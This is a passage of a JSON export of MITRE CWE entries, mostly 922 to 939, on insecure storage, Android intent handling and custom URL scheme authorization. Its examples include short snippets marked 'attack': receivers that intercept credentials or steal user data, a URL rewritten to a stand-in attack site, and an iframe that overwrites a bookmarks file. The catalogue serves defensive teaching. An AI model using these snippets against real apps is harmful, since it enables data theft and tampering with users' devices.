mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can modify or delete sensitive information by accessing the unrestricted storage mechanism."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-921"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"922":{"attr":{"@_ID":"922","@_Name":"Insecure Storage of Sensitive Information","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores sensitive information without properly limiting read or write access by unauthorized actors.","Extended_Description":"If read access is not properly restricted, then attackers can steal the sensitive information. If write access is not properly restricted, then attackers can modify and possibly delete the data, causing incorrect results and possibly a denial of service.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"Attackers can read sensitive information by accessing the unrestricted storage mechanism."}]},"Notes":{"Note":[{"#text":"There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.","attr":{"@_Type":"Relationship"}},{"#text":"This is a high-level entry that includes children from various parts of the CWE research view (CWE-1000). Currently, most of the information is in these child entries. This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"923":{"attr":{"@_ID":"923","@_Name":"Improper Restriction of Communication Channel to Intended Endpoints","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to (or from) an endpoint for privileged or protected operations, but it does not properly ensure that it is communicating with the correct endpoint.","Extended_Description":{"xhtml:p":["Attackers might be able to spoof the intended endpoint from a different system or process, thus gaining the same level of access as the intended endpoint.","While this issue frequently involves authentication between network-based clients and servers, other types of communication channels and endpoints can have this weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attacker can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"501"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Authentication of Endpoint in a Communication Channel","attr":{"@_Date":"2014-02-18"}}}},"924":{"attr":{"@_ID":"924","@_Name":"Improper Enforcement of Message Integrity During Transmission in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel with an endpoint and receives a message from that endpoint, but it does not sufficiently ensure that the message was not modified during transmission.","Extended_Description":"Attackers might be able to modify the message and spoof the endpoint by interfering with the data as it crosses the network or by redirecting the connection to a system under their control.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":"Gain Privileges or Assume Identity","Note":"If an attackers can spoof the endpoint, the attacker gains all the privileges that were intended for the original endpoint."}},"Notes":{"Note":{"#text":"This entry should be made more comprehensive in later CWE versions, as it is likely an important design flaw that underlies (or chains to) other weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-23"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"925":{"attr":{"@_ID":"925","@_Name":"Improper Verification of Intent by Broadcast Receiver","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses a Broadcast Receiver that receives an Intent but does not properly verify that the Intent came from an authorized source.","Extended_Description":"Certain types of Intents, identified by action string, can only be broadcast by the operating system itself, not by third-party applications. However, when an application registers to receive these implicit system intents, it is also registered to receive any explicit intents. While a malicious application cannot send an implicit system intent, it can send an explicit intent to the target application, which may assume that any received intent is a valid implicit system intent and not an explicit intent from another application. This may lead to unintended behavior.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Intent Spoofing"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"Another application can impersonate the operating system and cause the software to perform an unintended action."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Before acting on the Intent, check the Intent Action to make sure it matches the expected System action."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;manifest package=\\"com.example.vulnerableApplication\\"&gt;&lt;/manifest&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;application&gt;&lt;/application&gt;","xhtml:br":["","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;receiver android:name=\\".ShutdownReceiver\\"&gt;&lt;/receiver&gt;","xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;action android:name=\\"android.intent.action.ACTION_SHUTDOWN\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(Intent.ACTION_SHUTDOWN);BroadcastReceiver sReceiver = new ShutDownReceiver();registerReceiver(sReceiver, filter);public class ShutdownReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"@Overridepublic void onReceive(final Context context, final Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"mainActivity.saveLocalData();mainActivity.stopActivity();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["The ShutdownReceiver class will handle the intent:","Because the method does not confirm that the intent action is the expected system intent, any received intent will trigger the shutdown procedure, as shown here:","An attacker can use this behavior to cause a denial of service."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"499"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}}},"Notes":{"Note":{"#text":"This entry will be made more comprehensive in later CWE versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-06-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"926":{"attr":{"@_ID":"926","@_Name":"Improper Export of Android Application Components","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.","Extended_Description":{"xhtml:p":"The attacks and consequences of improperly exporting a component may depend on the exported component:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If access to an exported Activity is not restricted, any application will be able to launch the activity. This may allow a malicious application to gain access to sensitive information, modify the internal state of the application, or trick a user into interacting with the victim application while believing they are still interacting with the malicious application.","If access to an exported Service is not restricted, any application may start and bind to the Service. Depending on the exposed functionality, this may allow a malicious application to perform unauthorized actions, gain access to sensitive information, or corrupt the internal state of the application.","If access to a Content Provider is not restricted to only the expected applications, then malicious applications might be able to access the sensitive data. Note that in Android before 4.2, the Content Provider is automatically exported unless it has been explicitly declared as NOT exported."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["There are three types of components that can be exported in an Android application.","An Activity is an application component that provides a UI for users to interact with. A typical application will have multiple Activity screens that perform different functions, such as a main Activity screen and a separate settings Activity screen.","A Service is an application component that is started by another component to execute an operation in the background, even after the invoking component is terminated. Services do not have a UI component visible to the user.","The Content Provider mechanism can be used to share data with other applications or internally within the same application."],"xhtml:div":[{"#text":"Activity","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Service","attr":{"@_style":"color:#32498D; font-weight:bold;"}},{"#text":"Content Provider","attr":{"@_style":"color:#32498D; font-weight:bold;"}}]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can launch the Activity."},{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","DoS: Instability","Varies by Context"],"Note":"Other applications, possibly untrusted, can bind to the Service."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Other applications, possibly untrusted, can read or modify the data that is offered by the Content Provider."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If they do not need to be shared by other applications, explicitly mark components with android:exported=\\"false\\" in the application manifest."},{"Phase":"Build and Compilation","Strategy":"Attack Surface Reduction","Description":"If you only intend to use exported components between related apps under your control, use android:protectionLevel=\\"signature\\" in the xml manifest to restrict access to applications signed by you."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Attack Surface Reduction","Description":"Limit Content Provider permissions (read/write) as appropriate."},{"Phase":["Build and Compilation","Architecture and Design"],"Strategy":"Separation of Privilege","Description":"Limit Content Provider permissions (read/write) as appropriate."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application is exporting an activity and a service in its manifest.xml:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;activity android:name=\\"com.example.vulnerableApp.mainScreen\\"&gt;&lt;/activity&gt;&lt;service android:name=\\"com.example.vulnerableApp.backgroundService\\"&gt;&lt;/service&gt;","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"&lt;action android:name=\\"com.example.vulnerableApp.OPEN_UI\\" /&gt;&lt;category android:name=\\"android.intent.category.DEFAULT\\" /&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;intent-filter&gt;&lt;/intent-filter&gt;","xhtml:br":["","","",""],"xhtml:i":["...","..."],"xhtml:div":{"#text":"&lt;action android:name=\\"com.example.vulnerableApp.START_BACKGROUND\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":""}},"Body_Text":"Because these components have intent filters but have not explicitly set \'android:exported=false\' elsewhere in the manifest, they are automatically exported so that any other application can launch them. This may lead to unintended behavior or exploits."},{"Intro_Text":"This application has created a content provider to enable custom search suggestions within the application:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;provider&gt;&lt;/provider&gt;","xhtml:div":{"#text":"android:name=\\"com.example.vulnerableApp.searchDB\\"android:authorities=\\"com.example.vulnerableApp.searchDB\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because this content provider is only intended to be used within the application, it does not need to be exported. However, in Android before 4.2, it is automatically exported thus potentially allowing malicious applications to access sensitive information."}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-923"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-01-22","Modification_Importance":"Critical","Modification_Comment":"Expanded entry to be more general and include all types of Android components that may be improperly exported."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Improper Restriction of Content Provider Export to Other Applications","attr":{"@_Date":"2014-02-18"}}}},"927":{"attr":{"@_ID":"927","@_Name":"Use of Implicit Intent for Sensitive Communication","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The Android application uses an implicit intent for transmitting sensitive data to other applications.","Extended_Description":{"xhtml:p":["Since an implicit intent does not specify a particular application to receive the data, any application can process the intent by using an Intent Filter for that intent. This can allow untrusted applications to obtain sensitive data. There are two variations on the standard broadcast intent, ordered and sticky.","Ordered broadcast intents are delivered to a series of registered receivers in order of priority as declared by the Receivers. A malicious receiver can give itself a high priority and cause a denial of service by stopping the broadcast from propagating further down the chain. There is also the possibility of malicious data modification, as a receiver may also alter the data within the Intent before passing it on to the next receiver. The downstream components have no way of asserting that the data has not been altered earlier in the chain.","Sticky broadcast intents remain accessible after the initial broadcast. An old sticky intent will be broadcast again to any new receivers that register for it in the future, greatly increasing the chances of information exposure over time. Also, sticky broadcasts cannot be protected by permissions that may apply to other kinds of intents.","In addition, any broadcast intent may include a URI that references data that the receiving component does not normally have the privileges to access. The sender of the intent can include special privileges that grant the receiver read or write access to the specific URI included in the intent. A malicious receiver that intercepts this intent will also gain those privileges and be able to read or write the resource at the specified URI."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Other applications, possibly untrusted, can read the data that is offered through the Intent."},{"Scope":"Integrity","Impact":"Varies by Context","Note":"The application may handle responses from untrusted applications on the device, which could cause it to perform unexpected or unauthorized actions."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"If the application only requires communication with its own components, then the destination is always known, and an explicit intent could be used."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This application wants to create a user account in several trusted applications using one broadcast intent:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.CreateUser\\");intent.putExtra(\\"Username\\", uname_string);intent.putExtra(\\"Password\\", pw_string);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.CreateUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":["This application assumes only the trusted applications will be listening for the action. A malicious application can register for this action and intercept the user\'s login information, as below:","When a broadcast contains sensitive information, create an allowlist of applications that can receive the action using the application\'s manifest file, or programmatically send the intent to each individual intended receiver."]},{"Intro_Text":"This application interfaces with a web service that requires a separate user login. It creates a sticky intent, so that future trusted applications that also use the web service will know who the current user is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.service.UserExists\\");intent.putExtra(\\"Username\\", uname_string);sendStickyBroadcast(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.service.UserExists\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);","xhtml:br":["",""]}}],"Body_Text":"Sticky broadcasts can be read by any application at any time, and so should never contain sensitive information such as a username."},{"Intro_Text":"This application is sending an ordered broadcast, asking other applications to open a URL:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.OpenURL\\");intent.putExtra(\\"URL_TO_OPEN\\", url_string);sendOrderedBroadcastAsUser(intent);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String Url = intent.getStringExtra(Intent.URL_TO_OPEN);attackURL = \\"www.example.com/attack?\\" + Url;setResultData(attackURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}],"Body_Text":["Any application in the broadcast chain may alter the data within the intent. This malicious application is altering the URL to point to an attack site:","The final receiving application will then open the attack URL. Where possible, send intents to specific trusted applications instead of using a broadcast chain."]},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-922","@_Section":"3.2.1"}},{"attr":{"@_External_Reference_ID":"REF-923"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-07-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"939":{"attr":{"@_ID":"939","@_Name":"Improper Authorization in Handler for Custom URL Scheme","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a handler for a custom URL scheme, but it does not properly restrict which actors can invoke the handler using the scheme.","Extended_Description":"Mobile platforms and other architectures allow the use of custom URL schemes to facilitate communication between applications. In the case of iOS, this is the only method to do inter-application communication. The implementation is at the developer\'s discretion which may open security flaws in the application. An example could be potentially dangerous functionality such as modifying files through a custom URL scheme.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Utilize a user prompt pop-up to authorize potentially harmful actions such as those modifying data or dealing with sensitive information.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This iOS application uses a custom URL scheme. The replaceFileText action in the URL scheme allows an external application to interface with the file incomingMessage.txt and replace the contents with the text field of the query string.","Body_Text":["External Application","Application URL Handler","The handler has no restriction on who can use its functionality. The handler can be invoked using any method that invokes the URL handler such as the following malicious iframe embedded on a web page opened by Safari.","The attacker can host a malicious website containing the iframe and trick users into going to the site via a crafted phishing email. Since Safari automatically executes iframes, the user is not prompted when the handler executes the iframe code which automatically invokes the URL handler replacing the bookmarks file with a list of malicious websites. Since replaceFileText is a potentially dangerous action, an action that modifies data, there should be a sanity check before the writeToFile:withText: function."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Objective-C"},"xhtml:div":{"#text":"NSString *stringURL = @\\"appscheme://replaceFileText?file=incomingMessage.txt&amp;text=hello\\";NSURL *url = [NSURL URLWithString:stringURL];[[UIApplication sharedApplication] openURL:url];","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"- (BOOL)application:(UIApplication *)application handleOpenURL:(NSURL *)url {}","xhtml:br":"","xhtml:div":{"#text":"if (!url) {}NSString *action = [url host];if([action isEqualToString: @\\"replaceFileText\\"]) {}return YES;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return NO;","attr":{"@_style":"margin-left:10px;"}},{"#text":"NSDictionary *dict = [self parseQueryStringExampleFunction:[url query]];FileObject *objectFile = [self writeToFile:[dict objectForKey: @\\"file\\"] withText:[dict objectForKey: @\\"text\\"]];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//this function will write contents to a specified file"}],"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"&lt;iframe src=\\"appscheme://replaceFileText?file=Bookmarks.dat&amp;text=listOfMaliciousWebsites\\"&gt;"}]},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5725","Description":"URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5725"},{"Reference":"CVE-2013-5726","Description":"URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired 